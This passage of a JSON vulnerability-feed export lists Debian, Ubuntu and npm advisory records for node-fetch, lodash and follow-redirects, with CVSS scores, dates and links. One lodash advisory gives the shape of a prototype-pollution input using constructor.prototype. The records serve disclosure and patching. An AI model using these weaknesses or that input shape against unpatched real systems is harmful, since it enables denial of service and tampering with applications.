tied up doing work on a large file (DoS) and/or cost you money in computing.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T19:15:00", "type": "debiancve", "title": "CVE-2020-15168", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-09-10T19:15:00", "id": "DEBIANCVE:CVE-2020-15168", "href": "https://security-tracker.debian.org/tracker/CVE-2020-15168", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:01:08", "description": "Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-15T11:15:00", "type": "debiancve", "title": "CVE-2020-28500", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-02-15T11:15:00", "id": "DEBIANCVE:CVE-2020-28500", "href": "https://security-tracker.debian.org/tracker/CVE-2020-28500", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-04T06:01:08", "description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-07-26T00:15:00", "type": "debiancve", "title": "CVE-2019-10744", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2019-07-26T00:15:00", "id": "DEBIANCVE:CVE-2019-10744", "href": "https://security-tracker.debian.org/tracker/CVE-2019-10744", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-04T06:01:08", "description": "Prototype pollution attack when using _.zipObjectDeep in lodash before 4.17.20.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-15T17:15:00", "type": "debiancve", "title": "CVE-2020-8203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2020-07-15T17:15:00", "id": "DEBIANCVE:CVE-2020-8203", "href": "https://security-tracker.debian.org/tracker/CVE-2020-8203", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2022-07-04T06:01:08", "description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T13:15:00", "type": "debiancve", "title": "CVE-2021-23337", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-02-15T13:15:00", "id": "DEBIANCVE:CVE-2021-23337", "href": "https://security-tracker.debian.org/tracker/CVE-2021-23337", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-11-03T18:10:44", "description": "Exposure of Sensitive Information to an Unauthorized Actor in NPM follow-redirects prior to 1.14.8.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T11:15:00", "type": "debiancve", "title": "CVE-2022-0536", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-02-09T11:15:00", "id": "DEBIANCVE:CVE-2022-0536", "href": "https://security-tracker.debian.org/tracker/CVE-2022-0536", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-12-23T02:08:35", "description": "Denial of Service in GitHub repository node-fetch/node-fetch prior to 3.2.10.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-01T15:15:00", "type": "debiancve", "title": "CVE-2022-2596", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-01T15:15:00", "id": "DEBIANCVE:CVE-2022-2596", "href": "https://security-tracker.debian.org/tracker/CVE-2022-2596", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-23T02:08:35", "description": "node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-16T17:15:00", "type": "debiancve", "title": "CVE-2022-0235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-01-16T17:15:00", "id": "DEBIANCVE:CVE-2022-0235", "href": "https://security-tracker.debian.org/tracker/CVE-2022-0235", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-11-03T18:10:44", "description": "follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-10T20:15:00", "type": "debiancve", "title": "CVE-2022-0155", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-01-10T20:15:00", "id": "DEBIANCVE:CVE-2022-0155", "href": "https://security-tracker.debian.org/tracker/CVE-2022-0155", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:26:38", "description": "node-fetch before versions 2.6.1 and 3.0.0-beta.9 did not honor the size\noption after following a redirect, which means that when a content size was\nover the limit, a FetchError would never get thrown and the process would\nend without failure. For most people, this fix will have a little or no\nimpact. However, if you are relying on node-fetch to gate files above a\nsize, the impact could be significant, for example: If you don't\ndouble-check the size of the data after fetch() has completed, your JS\nthread could get tied up doing work on a large file (DoS) and/or cost you\nmoney in computing.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2020-09-10T00:00:00", "type": "ubuntucve", "title": "CVE-2020-15168", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2020-09-10T00:00:00", "id": "UB:CVE-2020-15168", "href": "https://ubuntu.com/security/CVE-2020-15168", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-27T13:36:20", "description": "Lodash versions prior to 4.17.21 are vulnerable to Regular Expression\nDenial of Service (ReDoS) via the toNumber, trim and trimEnd functions.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-02-15T00:00:00", "type": "ubuntucve", "title": "CVE-2020-28500", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2021-02-15T00:00:00", "id": "UB:CVE-2020-28500", "href": "https://ubuntu.com/security/CVE-2020-28500", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T13:38:37", "description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype\nPollution. The function defaultsDeep could be tricked into adding or\nmodifying properties of Object.prototype using a constructor payload.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=933079>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-07-26T00:00:00", "type": "ubuntucve", "title": "CVE-2019-10744", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2019-07-26T00:00:00", "id": "UB:CVE-2019-10744", "href": "https://ubuntu.com/security/CVE-2019-10744", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-27T13:41:29", "description": "Prototype pollution attack when using _.zipObjectDeep in lodash before\n4.17.20.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2020-07-15T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8203", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8203"], "modified": "2020-07-15T00:00:00", "id": "UB:CVE-2020-8203", "href": "https://ubuntu.com/security/CVE-2020-8203", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-01-27T13:36:21", "description": "Lodash versions prior to 4.17.21 are vulnerable to Command Injection via\nthe template function.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-15T00:00:00", "type": "ubuntucve", "title": "CVE-2021-23337", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-23337"], "modified": "2021-02-15T00:00:00", "id": "UB:CVE-2021-23337", "href": "https://ubuntu.com/security/CVE-2021-23337", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T13:23:11", "description": "Exposure of Sensitive Information to an Unauthorized Actor in NPM\nfollow-redirects prior to 1.14.8.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-02-09T00:00:00", "type": "ubuntucve", "title": "CVE-2022-0536", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0536"], "modified": "2022-02-09T00:00:00", "id": "UB:CVE-2022-0536", "href": "https://ubuntu.com/security/CVE-2022-0536", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-10-26T13:13:21", "description": "Denial of Service in GitHub repository node-fetch/node-fetch prior to\n3.2.10.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-01T00:00:00", "type": "ubuntucve", "title": "CVE-2022-2596", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-2596"], "modified": "2022-08-01T00:00:00", "id": "UB:CVE-2022-2596", "href": "https://ubuntu.com/security/CVE-2022-2596", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T13:24:30", "description": "node-fetch is vulnerable to Exposure of Sensitive Information to an\nUnauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-01-16T00:00:00", "type": "ubuntucve", "title": "CVE-2022-0235", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0235"], "modified": "2022-01-16T00:00:00", "id": "UB:CVE-2022-0235", "href": "https://ubuntu.com/security/CVE-2022-0235", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2022-10-26T13:24:55", "description": "follow-redirects is vulnerable to Exposure of Private Personal Information\nto an Unauthorized Actor", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-01-10T00:00:00", "type": "ubuntucve", "title": "CVE-2022-0155", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155"], "modified": "2022-01-10T00:00:00", "id": "UB:CVE-2022-0155", "href": "https://ubuntu.com/security/CVE-2022-0155", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "nodejs": [{"lastseen": "2021-09-23T06:35:47", "description": "## Overview\n\nNode Fetch did not honor the size option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure.\n\nFor most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after fetch() has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n\n## Recommendation\n\nUpgrade to version 2.6.1 or 3.0.0-beta.9\n\n## References\n\n- https://github.com/node-fetch/node-fetch/security/advisories/GHSA-w7rc-rwvf-8q5r\n- [GitHub Advisory](https://github.com/advisories/GHSA-w7rc-rwvf-8q5r)", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-10T17:55:53", "type": "nodejs", "title": "Denial of Service", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2021-09-23T08:07:19", "id": "NODEJS:1556", "href": "https://www.npmjs.com/advisories/1556", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-09-23T06:35:51", "description": "## Overview\n\nVersions of `lodash` before 4.17.12 are vulnerable to Prototype Pollution. The function `defaultsDeep` allows a malicious user to modify the prototype of `Object` via `{constructor: {prototype: {...}}}` causing the addition or modification of an existing property that will exist on all objects.\n\n\n\n## Recommendation\n\nUpdate to version 4.17.12 or later.\n\n## References\n\n- [Snyk Advisory](https://snyk.io/vuln/SNYK-JS-LODASH-450202)\n- [GitHub Advisory](https://github.com/advisories/GHSA-jf85-cpcp-j695)", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.2}, "published": "2019-07-15T17:22:56", "type": "nodejs", "title": "Prototype Pollution", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": 